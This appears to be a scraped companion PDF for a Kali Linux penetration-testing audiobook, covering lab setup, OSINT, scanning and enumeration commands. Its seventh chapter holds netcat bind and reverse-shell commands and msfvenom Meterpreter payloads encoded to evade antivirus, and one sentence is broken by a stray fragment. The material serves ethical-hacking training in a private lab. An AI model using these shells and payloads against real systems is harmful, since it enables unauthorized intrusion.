The Ultimate Kali Linux Book - Supplementary Materials

Download as pdf or txt
Download as pdf or txt
You are on page 1of 360

Preface

To get the most out of this audiobook


To get the most out of this audiobook, it's recommended to have a solid foundation in
networking, such as understanding common network and application protocols of the
TCP/IP, IP addressing, routing and switching concepts, and the roles and function of
networking devices and security appliances. Knowing virtualization technologies such as
hypervisors and their components will be beneficial as most labs are built within a
virtualized environment to reduce the need to purchase additional systems.
All labs and exercises are built on a system running Windows 10 Home as the host
operating system, a multicore processor with virtualization enabled, 16 GB of RAM, and
300 GB of free storage for the virtual machines. A dedicated GPU will be needed to
perform password cracking using a GPU-based tool and two wireless network adapters
that support packet injection and operate at 2.4 and 5 GHz.
Oracle VM VirtualBox was the preferred choice when choosing a hypervisor as it
provides better virtual networking capabilities as compared to other solutions.
However, if you prefer to use another hypervisor product such as VMware, you are free
to do so, but please keep in mind the fact that all labs within this audiobook were
completed and tested using Oracle VM VirtualBox.

Note
While the content and labs found within this audiobook are based on Kali Linux 2021,
the concepts and exercises are applicable to later versions of Kali Linux that will be
released in the future.

After completing this audiobook, equipped with your imagination and newfound skills,
attempt to create additional lab scenarios and even extend your lab environment by
adding additional virtual machines to improve your skillset. This will help you to
continue learning and further develop your skills as an aspiring ethical hacker and
penetration tester.

Download the images, links, tables, and code and


command
Packt audiobooks have been selected for a seamless audio experience. Some topics,
however, do come with elements like images, links, tables, and code that aren't natural
for this medium. We've made minor changes to the content of the audiobooks so that
you can listen to the audio without needing to refer to these visual elements unless
necessary. To give you the choice between listening to just the audio and listening to
the audio while following the example code and GUI steps, we've created a PDF that
contains all the elements you need to achieve the goals of this audiobook. All references
to images and code in the audiobook can be found within this PDF. You can download
the PDF from github.com/PacktPublishing/The-Ultimate-Kali-Linux-Book-Audiobook
Chapter 1

Figure 1.1 – Penetration testing phases

Figure 1.2 – Pre-engagement


Figure 1.3 – Hacking phases

Figure 1.4 – Cyber Kill Chain


Figure 1.5 – USB ninja cable

Figure 1.6 – USB rubber ducky

Figure 1.7 – C2 operations


Further reading
To learn more on the subject, check out the following links:
 Understanding network port numbers:
https://hub.packtpub.com/understanding-network-port-numbers-tcp-udp-
and-icmp-on-an-operating-system/

 Vulnerabilities in the Application and Transport Layer of the TCP/IP stack:


https://hub.packtpub.com/vulnerabilities-in-the-application-and-transport-
layer-of-the-tcp-ip-stack/

 Understanding IP address spaces: https://hub.packtpub.com/understanding-


address-spaces-and-subnetting-in-ipv4-tutorial/

 The Cyber Kill Chain: https://www.lockheedmartin.com/en-


us/capabilities/cyber/cyber-kill-chain.html
Chapter 2
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Oracle VM VirtualBox: https://www.virtualbox.org/wiki/Downloads

 Oracle VM VirtualBox Extension Pack:


https://www.virtualbox.org/wiki/Downloads

 Vagrant: https://www.vagrantup.com/downloads

 Kali Linux 2021.2: https://www.kali.org/get-kali/

 OWASP Juice Shop: https://owasp.org/www-project-juice-shop/

 Metasploitable 2:
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

 Metasploitable 3: https://app.vagrantup.com/rapid7/boxes/metasploitable3-
win2k8

 OWASP Broken Web Applications:


https://sourceforge.net/projects/owaspbwa/files/
Images

Figure 2.1 – Lab topology

Figure 2.2 – VirtualBox download page


Figure 2.3 – VirtualBox extension pack

Figure 2.4 – Kali Linux virtual image


Figure 2.5 – Downloading Kali Linux

Figure 2.6 – Importing Kali Linux


Figure 2.7 – Starting the import process

Figure 2.8 – Enabling nested virtualization on the virtual machine

Figure 2.9 – Accessing the settings


Figure 2.10 – Adjusting Base Memory

Figure 2.11 – Internet assigned network adapter


Figure 2.12 – Adding the PentestNet adapter

Figure 2.13 – Assigning the Red Team network


Figure 2.14 – Logon window on Kali Linux

Figure 2.15 – List of tools on Kali Linux


Figure 2.16 – Checking the IP address of the network adapter

Figure 2.17 – Testing internet connectivity


Figure 2.18 – Updating the source lists

Figure 2.19 – Upgrading packages on Kali Linux


Figure 2.20 – Creating a virtual machine

Figure 2.21 – Hard Disk Selector


Figure 2.22 – Attaching a virtual hard drive
Figure 2.23 – Network adapter configurations

Figure 2.24 – Verifying network connectivity

Figure 2.25 – Installing Vagrant plugins


Figure 2.26 – Selecting the preferred hypervisor

Figure 2.27 – Metasploitable 3 download status


Figure 2.28 – Metasploitable 3 networking settings
Figure 2.29 – Dual-homed network connection

Figure 2.30 – Choosing a provider


Figure 2.31 – Connecting to the HiddenNet virtual network

Figure 2.32 – Installing Docker PGP keys


Figure 2.33 – Configuring the Docker repository

Figure 2.34 – Installing Docker on Kali Linux


Figure 2.35 – OWASP Juice Shop Docker container

Figure 2.36 – Starting the OWASP Juice Shop Docker container


Figure 2.37 – OWASP Juice Shop user interface

Figure 2.38 – OWASP BWA virtual machine


Figure 2.39 – Selecting the virtual disk file

Figure 2.40 – Network adapter configurations


Figure 2.41 – Verifying network connectivity

Code and Commands


C:\> cd C:\Program Files\Oracle\VirtualBox
C:\Program Files\Oracle\VirtualBox> vboxmanage dhcpserver
add --network=PentestNet --server-ip=172.30.1.1 --lower-
ip=172.30.1.20 --upper-ip=172.30.1.50 --
netmask=255.255.255.0 --enable
Command 2.1
C:\> cd C:\Program Files\Oracle\VirtualBox
C:\Program Files\Oracle\VirtualBox> vboxmanage dhcpserver
add --network=HiddenNet --server-ip=10.11.12.1 --lower-
ip=10.11.12.20 --upper-ip=10.11.12.50 --
netmask=255.255.255.0 --enable
Command 2.2

C:\> cd C:\Program Files\Oracle\VirtualBox


C:\Program Files\Oracle\VirtualBox> vboxmanage dhcpserver
add --network=RedTeamLab --server-ip=192.168.42.1 --lower-
ip=192.168.42.20 --upper-ip=192.168.42.50 --
netmask=255.255.255.0 --enable
Command 2.3

C:\> cd C:\Program Files\Oracle\VirtualBox


C:\Program Files\Oracle\VirtualBox> VBoxManage.exe list vms
Command 2.4

C:\Program Files\Oracle\VirtualBox> VBoxManage.exe modifyvm


"VM Name" --nested-hw-virt on
Command 2.5

C:\Users\Slayer> vagrant plugin install vagrant-reload


C:\Users\Slayer> vagrant plugin install vagrant-vbguest
Command 2.6

C:\Users\Slayer> vagrant box add rapid7/metasploitable3-


win2k8
Command 2.7
C:\Users\Slayer> cd .vagrant.d\boxes
C:\Users\Slayer\.vagrant.d\boxes> vagrant init
metasploitable3-win2k8
C:\Users\Slayer\.vagrant.d\boxes> vagrant up
Command 2.8

C:\Users\Slayer> vagrant box add rapid7/metasploitable3-


ub1404
Command 2.9

C:\Users\Slayer> cd .vagrant.d
C:\Users\Slayer\.vagrant.d> del Vagrantfile
C:\Users\Slayer\.vagrant.d> vagrant init metasploitable3-
ub1404
C:\Users\Slayer\.vagrant.d> vagrant up
Command 2.10

curl -fsSL https://download.docker.com/linux/debian/gpg |


gpg --dearmor | sudo tee /usr/share/keyrings/docker-
archive-keyring.gpg >/dev/null
Command 2.11

echo 'deb [arch=amd64 signed-by=/usr/share/keyrings/docker-


archive-keyring.gpg]
https://download.docker.com/linux/debian buster stable' |
sudo tee /etc/apt/sources.list.d/docker.list
Command 2.12

sudo apt-get update


Command 2.13

sudo apt install -y docker-ce docker-ce-cli containerd.io


Command 2.14
sudo docker pull bkimminich/juice-shop
Command 2.15

sudo docker run --rm -p 3000:3000 bkimminich/juice-shop


Command 2.16

Further reading
To learn more on the topics that were covered in this chapter, take a look at the
following resources:
 Why secure web-based applications? https://hub.packtpub.com/why-secure-
web-based-applications-with-kali-linux/

 Kali Linux 2021.2 release information: https://www.kali.org/blog/kali-linux-


2021-2-release/
Chapter 3
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Oracle VM VirtualBox: https://www.virtualbox.org/

 Windows Server 2019: https://www.microsoft.com/en-


us/evalcenter/evaluate-windows-server-2019

 Windows 10 Enterprise: https://www.microsoft.com/en-


us/evalcenter/evaluate-windows-10-enterprise

 Ubuntu Server 20.04.2: https://ubuntu.com/download/server

 FreeRadius: https://freeradius.org/

 A physical wireless router that supports the WEP, WPA2-Personal, and WPA2-
Enterprise security standards
Images

Figure 3.1 – Windows red teaming lab topology

Figure 3.2 – User accounts


Figure 3.3 – Windows Setup

Figure 3.4 – VirtualBox Guest Additions


Figure 3.5 – Windows Explorer

Figure 3.6 – Windows Run application


Figure 3.7 – System Properties

Figure 3.8 – Enabling network discovery


Figure 3.9 – Turning on network discovery on Windows 10

Figure 3.10 – Server Manager


Figure 3.11 – Installation Type

Figure 3.12 – Promote this server to a domain controller

Figure 3.13 – Deployment Configuration


Figure 3.14 – Logging in to the domain

Figure 3.15 – Group Policy Management


Figure 3.17 – Disabling antimalware protection
Figure 3.16 – Editing a GPO

Figure 3.18 – Verifying shared folders

Figure 3.19 – Creating an SPN on Windows Server


Figure 3.20 – Sign-in window

Figure 3.21 – Wireless penetration testing lab


Figure 3.23 – Creating a virtual hard disk

Figure 3.24 – Configuring network settings


Figure 3.25 – Attaching a bootable disk

Figure 3.26 – FreeRadius files


Figure 3.27 – Creating a user account

Figure 3.28 – Creating an AAA client account


Figure 3.29 – Verifying the FreeRadius service's status

Figure 3.30 – Verifying RADIUS open ports

Figure 3.31 – Changing the wireless network's name


Figure 3.32 – Configuring wireless security

Code and Commands


C:\Users\Administrator> net user bob Password1 /add /domain
C:\Users\Administrator> net user alice Password1 /add
/domain
C:\Users\Administrator> net user johndoe Password123 /add
/domain
C:\Users\Administrator> net user sqladmin Password45 /add
/domain
Command 3.1
C:\Users\Administrator> net localgroup "Administrators"
johndoe /add
C:\Users\Administrator> net group "Domain Admins" johndoe
/add /domain
C:\Users\Administrator> net group "Enterprise Admins"
johndoe /add /domain
C:\Users\Administrator> net group "Group Policy Creator
Owners" johndoe /add /domain
C:\Users\Administrator> net group "Schema Admins" johndoe
/add /domain
Command 3.2

C:\Users\Administrator> net localgroup "Administrators"


sqladmin /add
C:\Users\Administrator> net group "Domain Admins" sqladmin
/add /domain
C:\Users\Administrator> net group "Enterprise Admins"
sqladmin /add /domain
C:\Users\Administrator> net group "Group Policy Creator
Owners" sqladmin /add /domain
C:\Users\Administrator> net group "Schema Admins" sqladmin
/add /domain
Command 3.3

C:\Users\Administrator> cd\
C:\> mkdir CorporateFileShare
C:\> net share DataShare=c:\CorporateFileShare
Command 3.4
C:\Users\Administrator> setspn -a
DC1/sqladmin.REDTEAMLAB.local:64123 REDTEAMLAB\sqladmin
Command 3.5

C:\Windows\system32> netsh interface ip add dns "Ethernet"


192.168.42.22
Command 3.6

C:\Windows\system32> powershell
PS C:\Windows\system32> Add-Computer -DomainName
RedTeamLab.local -Restart
Command 3.7

C:\Users\Administrator> net localgroup "Administrators"


redteamlab\bob /ADD
C:\Users\Administrator> net localgroup "Administrators"
redteamlab\alice /ADD
Command 3.8

C:\Users\Administrator> cd \
C:\> mkdir SharedData
C:\> net share DataShare=c:\SharedData
Command 3.9

glen@freeradius:~$ sudo apt update


glen@freeradius:~$ sudo apt install freeradius
Command 3.10

glen@freeradius:~$ sudo ls -l /etc/freeradius/


Command 3.11
glen@freeradius:~$ sudo ls -l /etc/freeradius/3.0
Command 3.12

glen@freeradius:~$ sudo vi /etc/freeradius/3.0/users


Command 3.13

bob Cleartext-Password := "password123"


Code 3.1

glen@freeradius:~$ sudo vi /etc/freeradius/3.0/clients.conf


Command 3.14

client 172.16.17.199 {
secret = radiuspassword1
shortname = CorpAP
}
Code 3.2

glen@freeradius:~$ sudo systemctl restart freeradius


glen@freeradius:~$ sudo systemtctl status freeradius
Command 3.15

Further reading
To learn more about the topics that were covered in this chapter, take a look at the
following resources:
 Active Directory Domain Services: https://docs.microsoft.com/en-
us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-
domain-services-overview

 Understanding FreeRADIUS: https://freeradius.org/documentation/


Chapter 4
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2: https://www.kali.org/get-kali/

 Osintgram: https://github.com/Datalux/Osintgram

 Sherlock: https://github.com/sherlock-project/sherlock

Images

Figure 4.1 – Footprinting


Figure 4.2 – OSINT sources

Figure 4.3 – VPN servers


Figure 4.4 – Proxy chaining

Figure 4.5 – Locating the proxychains configuration file

Figure 4.6 – Editing the proxychain's configuration file


Figure 4.7 – Adding proxies

Figure 4.8 – Using proxychains

Figure 4.9 – TOR


Figure 4.10 – Setting the proxy list to use TOR only

Figure 4.11 – TOR status check

Figure 4.12 – TOR via proxychains


Figure 4.13 – WHOIS

Figure 4.14 – Job posting

Figure 4.15 – Hunter.io


Figure 4.16 – Employees' data

Figure 4.17 – Data sources


Figure 4.18 – Installing Recon-ng modules

Figure 4.19 – Displaying the modules

Figure 4.20 – Viewing workspaces


Figure 4.21 – Searching for modules

Figure 4.22 – Viewing the required parameters


Figure 4.23 – Executing a module

Figure 4.24 – Searching a module

Figure 4.25 – Viewing hosts


Figure 4.26 – Viewing contact details

Figure 4.27 – Activity summary

Figure 4.28 – Summary of collected data


Figure 4.29 – Reporting modules

Figure 4.30 – Generating a report


Figure 4.31 – HTML report

Figure 4.32 – Recon-ng web user interface


Figure 4.33 – Subdomains

Figure 4.34 – Adding user credentials

Figure 4.35 – Collecting information

Figure 4.36 – Collected data


Figure 4.37 – Sherlock

Figure 4.38 – Viewing the collected data

Figure 4.39 – Searching for a specific operating system


Figure 4.40 – Discovering open ports

Figure 4.41 – Web technologies and vulnerabilities


Figure 4.42 – Discovering running services

Figure 4.43 – Censys results


Figure 4.44 – Opening Maltego

Figure 4.45 – Maltego – Production Selection page


Figure 4.46 – Maltego's user interface

Figure 4.47 – Discovering mail servers


Figure 4.48 – Gathering the IP addresses of assets

Figure 4.49 – Gathering name servers


Figure 4.50 – Discovering web links on the target's website

Figure 4.51 – Discovering email addresses


Figure 4.52 – Netcraft

Figure 4.53 – Netcraft results

Figure 4.54 – Hosting history


Figure 4.55 – Server- and client-side technologies

Code and Commands


kali@kali:~$ sudo vi /etc/proxychains4.conf
Command 4.1

kali@kali:~$ sudo apt update


kali@kali:~$ sudo apt install tor
Command 4.2

kali@kali:~$ sudo vi /etc/proxychains4.conf


Command 4.3
kali@kali:~$ proxychains4 firefox
Command 4.4

[recon-ng][default] > marketplace install all


Command 4.5

[recon-ng][default] > workspaces create pentest1


Command 4.6

[recon-ng][pentest1][whois_pocs] > options set SOURCE


microsoft.com
Figure 4.7

[recon-ng][pentest1] > modules load recon/domains-


hosts/bing_domain_web
[recon-ng][pentest1][bing_domain_web] > info
Command 4.8

[recon-ng][pentest1] > modules load reporting/html


[recon-ng][pentest1] > info
[recon-ng][pentest1][html] > options set CREATOR Glen
[recon-ng][pentest1][html] > options set CUSTOMER MS-Target
[recon-ng][pentest1][html] > options set FILENAME
/home/kali/PenTest1-Report.html
[recon-ng][pentest1][html] > run
Command 4.9

kali@kali:~$ recon-web
Command 4.10
kali@kali:~$ theHarvester -h
Command 4.11

kali@kali:~$ theHarvester -d microsoft.com --dns-server


8.8.8.8 -b linkedin
Command 4.12

kali@kali:~$ theHarvester -d microsoft.com -b bing


Command 4.13

kali@kali:~$ git clone


https://github.com/Datalux/Osintgram.git
kali@kali:~$ sudo apt-get install python3-venv
Command 4.14

kali@kali:~$ cd Osintgram
kali@kali:~/Osintgram$ sudo python3 -m venv venv
kali@kali:~/Osintgram$ source venv/bin/activate
(venv)kali@kali:~/Osintgram$ sudo pip3 install -r
requirements.txt
Command 4.15

(venv)kali@kali:~/Osintgram$ make setup


Command 4.16

(venv)kali@kali:~/Osintgram$ sudo python3 main.py microsoft


Command 4.17

kali@kali:~$ sudo apt update


kali@kali:~$ git clone https://github.com/sherlock-
project/sherlock.git
Command 4.18
kali@kali:~$ cd sherlock
kali@kali:~/sherlock$ python3 -m pip install -r
requirements.txt
Command 4.19

kali@kali:~/sherlock$ python3 sherlock microsoft --timeout


5
Command 4.20

Further reading
To learn more about Make this a single sentence.
open source intelligence, please go to https://hub.packtpub.com/open-source-
intelligence/.
Chapter 5
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2: https://www.kali.org/get-kali/

 Metasploitable 2:
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

 OWASP Broken Web Applications:


https://sourceforge.net/projects/owaspbwa/files/

 S3Scanner: https://github.com/sa7mon/S3Scanner

Images

Figure 5.1 – Filtering results from a domain


Figure 5.2 – Keyword search

Figure 5.3 – Including multiple keywords


Figure 5.4 – Filtering by file types

Figure 5.5 – Filtering by specific URLs


Figure 5.6 – Filtering by specific keywords

Figure 5.7 – Google's Advanced search menu


Figure 5.8 – Advanced search parameters

Figure 5.9 – Google Hacking Database


Figure 5.10 – DNS query

Figure 5.11 – DNS response


Figure 5.12 – Client establishing a connection

Figure 5.13 – DNS enumeration


Figure 5.14 – Gathering DNS records

Figure 5.15 – Retrieving name servers

Figure 5.16 – Retrieving DNS records


Figure 5.17 – Zone transfer using DNSEnum

Figure 5.18 – DNS records

Figure 5.19 – Checking an IP address


Figure 5.20 – Spiderfoot web interface

Figure 5.21 – Sources

Figure 5.22 – New Scan


Figure 5.23 – Setting a target

Figure 5.24 – Spiderfoot use cases


Figure 5.25 – Spiderfoot graph

Figure 5.26 – Viewing data


Figure 5.27 – Source data elements

Figure 5.28 – Discovering subdomains


Figure 5.29 – Output file

Figure 5.30 – Screenshots

Figure 5.31 – Network-based firewall


Figure 5.32 – Checking network interfaces

Figure 5.33 – MAC Changer options

Figure 5.34 – Changing MAC address


Figure 5.35 – Checking your network

Figure 5.36 – Netdiscover host discovery

Figure 5.37 – Ping sweep using Nmap


Figure 5.38 – Discovering open ports

Figure 5.39 – Advanced scan results


Figure 5.40 – Operating system profiling

Figure 5.41 – Decoys


Figure 5.42 – TCP 3-way handshake

Figure 5.44 – Stealth scanning using Nmap

Figure 5.45 – Wireshark capture

Figure 5.46 – Searching the port scanning modules


Figure 5.47 – Viewing options

Figure 5.48 – TCP SYN scan

Figure 5.49 – Searching for modules

Figure 5.50 – Viewing module options


Figure 5.51 – Enumerating SMB

Figure 5.52 – Discovering shared drives

Figure 5.53 – Displaying the contents of a shared drive

Figure 5.54 – SSH version checker module


Figure 5.55 – Office 365 login page

Figure 5.57 – Found a valid user account


Figure 5.58 – S3Scanner options

Figure 5.59 – Obtaining an IP address

Figure 5.60 – Discovering an AWS S3 bucket


Figure 5.61 – Scanning with S3Scanner

Figure 5.62 – Viewing the files within an S3 bucket

Figure 5.63 – Downloading the necessary content

Figure 5.64 – Viewing the local files


Code and Commands
kali@kali:~$ dnsrecon -h
Command 5.1

kali@kali:~$ host -l zonetransfer.me nsztm1.digi.ninja


Command 5.2

kali@kali:~$ dnsenum zonetransfer.me


Command 5.3

kali@kali:~$ sudo spiderfoot -l 172.16.17.71:80


Command 5.4

kali@kali:~$ sudo apt update


kali@kali:~$ sudo apt install dnsmap
Command 5.5

kali@kali:~$ dnsmap microsoft.com


Command 5.6

kali@kali:~$ sudo apt update


kali@kali:~$ sudo apt install sublist3r
Command 5.7

kali@kali:~$ sublist3r -d microsoft.com


Command 5.8

kali@kali:~$ sublist3r -d microsoft.com -o subdomains.txt


Command 5.9
kali@kali:~$ git clone
https://github.com/FortyNorthSecurity/EyeWitness
Command 5.10

kali@kali:~$ cd EyeWitness/Python/setup
kali@kali:~/EyeWitness/Python/setup$ sudo ./setup.sh
Command 5.11

kali@kali:~/EyeWitness/Python/setup$ cd ..
Command 5.12

kali@kali:~/EyeWitness/Python$ ./EyeWitness.py --web -f


/home/kali/subdomains.txt -d /home/kali/screenshots --
prepend-https
Command 5.13

kali@kali:~$ sudo ifconfig eth0 down


Command 5.14

kali@kali:~$ sudo macchanger -A eth0


Command 5.15

kali@kali:~$ sudo ifconfig eth0 up


Command 5.16

kali@kali:~$ sudo netdiscover -r 172.30.1.0/24


Command 5.17

kali@kali:~$ nmap -sn 172.30.1.0/24 --exclude 172.30.1.27


Command 5.18

kali@kali:~$ nmap 172.30.1.26


Command 5.19
kali@kali:~$ nmap -A -T4 -p- 172.30.1.26
Command 5.20

kali@kali:~$ nmap 172.30.1.26 –D 172.30.1.20, 172.30.1.21,


172.30.1.22
Command 5.21

kali@kali:~$ nmap --spoof-mac 0 172.30.1.26


Command 5.22

kali@kali:~$ sudo nmap -S 172.30.1.23 -e eth0 172.30.1.26


Command 5.23

kali@kali:~$ sudo nmap -sS -p80 172.30.1.26


Command 5.24

kali@kali:~$ sudo msfconsole


Command 5.25

msf6 > search portscan


Command 5.26

msf6 > use auxiliary/scanner/portscan/syn


msf6 auxiliary(scanner/portscan/syn) > options
Command 5.27

msf6 auxiliary(scanner/portscan/syn) > set RHOSTS


172.30.1.26
msf6 auxiliary(scanner/portscan/syn) > run
Command 5.28

kali@kali:~$ msfconsole
Command 5.29
msf6 > search smb_version
Command 5.30

msf6 > use auxiliary/scanner/smb/smb_version


msf6 auxiliary(scanner/smb/smb_version) > options
Command 5.31

msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS


172.30.1.26
msf6 auxiliary(scanner/smb/smb_version) > run
Command 5.32

kali@kali:~$ smbmap -H 172.30.1.26


Command 5.33

kali@kali:~$ smbmap -H 172.30.1.26 -r tmp


Command 5.34

kali@kali:~$ sudo msfconsole


Command 5.35

msf6 > use auxiliary/scanner/ssh/ssh_version


msf6 auxiliary(scanner/ssh/ssh_version) > options
Command 5.36

msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS


172.30.1.26
msf6 auxiliary(scanner/ssh/ssh_version) > run
Command 5.37
[+] 172.30.1.26:22 - SSH server version: SSH-2.0-
OpenSSH_4.7p1 Debian-8ubuntu1 ( service.version=4.7p1
openssh.comment=Debian-8ubuntu1 service.vendor=OpenBSD
service.family=OpenSSH service.product=OpenSSH
service.cpe23=cpe:/a:openbsd:openssh:4.7p1 os.vendor=Ubuntu
os.family=Linux os.product=Linux os.version=8.04
os.cpe23=cpe:/o:canonical:ubuntu_linux:8.04
service.protocol=ssh fingerprint_db=ssh.banner )
Command 5.38

kali@kali:~$ sudo pip3 install s3scanner


Command 5.40

kali@kali:~$ aws configure


Command 5.41

kali@kali:~$ nslookup
> flaws.cloud
Command 5.42

> set type=ptr


> 52.218.228.98
Command 5.43

kali@kali:~$ s3scanner scan --bucket flaws.cloud


Command 5.44

kali@kali:~$ aws s3 ls s3://flaws.cloud/ --region us-west-2


--no-sign-request
Command 5.45
kali@kali:~$ mkdir S3_Bucket
kali@kali:~$ s3scanner dump --bucket flaws.cloud --dump-dir
/home/kali/S3_Bucket/
Command 5.46

kali@kali:~$ cd S3_Bucket
kali@kali:~/S3_Bucket$ ls -l
Command 5.47

kali@kali:~/S3_Bucket$ cat secret-dd02c7c.html


Command 5.48

Further reading
To learn more about what was covered in this chapter, take a look at the following
resources:
 Why is DNSSEC important?: https://www.icann.org/resources/pages/dnssec-
what-is-it-why-important-2019-03-05-en

 DNS Zone Transfer Protocol: https://datatracker.ietf.org/doc/html/rfc5936

 Nmap reference guide: https://nmap.org/book/man.html

 Information gathering with Metasploit: https://www.offensive-


security.com/metasploit-unleashed/information-gathering/

 Amazon S3 user guide:


https://docs.aws.amazon.com/AmazonS3/latest/userguide/Welcome.html

 Amazon S3 Security: https://aws.amazon.com/s3/security/


Chapter 6
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2: https://www.kali.org/get-kali/

 Nessus: https://www.tenable.com/products/nessus/nessus-essentials

 Greenbone Vulnerability Manager: https://github.com/greenbone/gvmd

Images

Figure 6.1 – Nessus installer

Figure 6.2 – Changing directories


Figure 6.3 – Nessus installation process

Figure 6.4 – Web browser security warning


Figure 6.5 – Selecting the Nessus version

Figure 6.6 – Nessus activation code window


Figure 6.7 – Registering Nessus

Figure 6.8 – Creating a user account


Figure 6.9 – The New Scan button

Figure 6.10 – Scanning templates


Figure 6.11 – Scan options

Figure 6.12 – Viewing the completed scans


Figure 6.13 – Scan results

Figure 6.14 – List of security vulnerabilities


Figure 6.15 – Viewing a vulnerability's details

Figure 6.16 – The vulnerability risk factor


Figure 6.17 – Identifying vulnerability scoring metrics

Figure 6.18 – VPR scoring system


Figure 6.19 – Reporting the output

Figure 6.20 – PDF reporting options


Figure 6.21 – Executive Summary report

Figure 6.22 – Custom report


Figure 6.23 – Discovering vulnerabilities

Figure 6.24 – Searching for exploits


Figure 6.25 – Searchsploit

Figure 6.26 – Searching for an exploit module

Figure 6.27 – Displaying information about an exploit module


Figure 6.28 – Vulnerability scanning

Figure 6.29 – The GVM setup process

Figure 6.30 – User account


Figure 6.31 – Security warning

Figure 6.32 – Sign-in window


Figure 6.33 – Adding a target

Code and Commands


kali@kali:~$ cd Downloads
kali@kali:~/Downloads$ ls
Command 6.1

kali@kali:~/Downloads$ sudo dpkg -i Nessus-8.15.0-


debian6_amd64.deb
Command 6.2

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Command 6.3

https://www.first.org/cvss/calculator/3.0#
Command 6.4

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:
L/PR:N/UI:N/S:U/C:H/I:H/A:H
Command 6.5

kali@kali:~$ nmap --script ftp-vsftpd-backdoor 172.30.1.26


Command 6.6
kali@kali:~$ nmap --script vuln 172.30.1.26
Command 6.7

kali@kali:~$ sudo apt update


kali@kali:~$ sudo apt install gvm
Command 6.8

kali@kali:~$ sudo gvm-setup


Command 6.9
Chapter 7
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
 Kali Linux 2021.2: https://www.kali.org/get-kali/

 Shellter: https://www.shellterproject.com/

 Alfa AWUS036NHA High Gain Wireless B/G/N USB adapter

 Alfa AWUS036ACH Long-Range Dual-Band AC1200 Wireless USB 3.0 Wi-Fi


adapter

Not all wireless cards support monitor mode and packet injection. However, making a
minor revision to a chipset can cause the card to not work in monitor mode, and some
cards may need the drivers to be compiled and may not work out of the box.

Images

Figure 7.1 – Telnet packets


Figure 7.2 – Sensitive data

Figure 7.3 – Bind shell


Figure 7.4 – Reverse shell

Figure 7.5 – Determining the IP address


Figure 7.6 – Accessing the Python3 web server

Figure 7.7 – Communicating via a remote shell

Figure 7.8 – Sending and receiving a message


Figure 7.9 – Bind shell

Figure 7.10 – Verifying the connection

Figure 7.11 – Reverse shell


Figure 7.12 – Checking the payload

Figure 7.13 – Checking payload2


Figure 7.14 – Checking payload3

Figure 7.15 – Choosing the mode of operation


Figure 7.16 – Specifying the Windows executable file

Figure 7.17 – Enabling stealth mode


Figure 7.18 – Configuring the payload using Shellter

Figure 7.19 – Verification


Figure 7.20 – Threat detection rating

Figure 7.21 – Delivering the payload

Figure 7.22 – Checking the user


Figure 7.23 – Alfa AWUS036NHA wireless network adapter

Figure 7.24 – Alfa AWUS036ACH wireless network adapter


Figure 7.25 – Virtual machine settings

Figure 7.26 – Adding a USB device


Figure 7.27 – Adding a USB adapter

Figure 7.28 – Wireless network adapter


Figure 7.29 – Viewing the wireless adapter's status

Figure 7.30 – Network adapter settings


Figure 7.31 – Adding the USB wireless adapter

Figure 7.32 – Identifying the chipset


Figure 7.33 – Displaying the wireless network adapters

Figure 7.34 – Checking the wireless interfaces

Figure 7.35 – Verifying the interface's status


Figure 7.36 – Testing packet injection

Figure 7.37 – Verifying the interface's status

Figure 7.38 – Checking the adapter's status

Figure 7.39 – Terminating processes


Figure 7.40 – Enabling monitor mode

Figure 7.41 – Checking the monitor interface

Figure 7.42 – Checking the packet injection's status

Figure 7.43 – Disabling monitor mode


Figure 7.44 – Checking the interface's status

Code and Commands


kali@kali:~$ cd /usr/share/windows-binaries
kali@kali:/usr/share/windows-binaries$ python3 -m
http.server 8080
Command 7.1

kali@kali:~$ nc -nlvp 1234


Command 7.2

C:\Users\Bob> nc -nv 172.30.1.29 1234


Command 7.3

kali@kali:~$ nc -nlvp 1234 -e /bin/bash


Command 7.4

C:\Users\Bob>nc -nv 172.30.1.29 1234


Command 7.5
kali@kali:~$ nc -nlvp 1234
Command 7.6

C:\Users\Bob> nc -nv 172.30.1.29 1234 -e cmd.exe


Command 7.7

kali@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp


LHOST=172.30.1.29 LPORT=4444 -f exe -o payload.exe
Command 7.8

kali@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp


LHOST=172.30.1.29 LPORT=4444 -f exe -o payload2.exe -e
x86/shikata_ga_nai -i 9
Command 7.9

kali@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp


LHOST=172.30.1.29 LPORT=4444 -f exe -o encoded_payload3.exe
-e x86/shikata_ga_nai -i 9 -x /usr/share/windows-
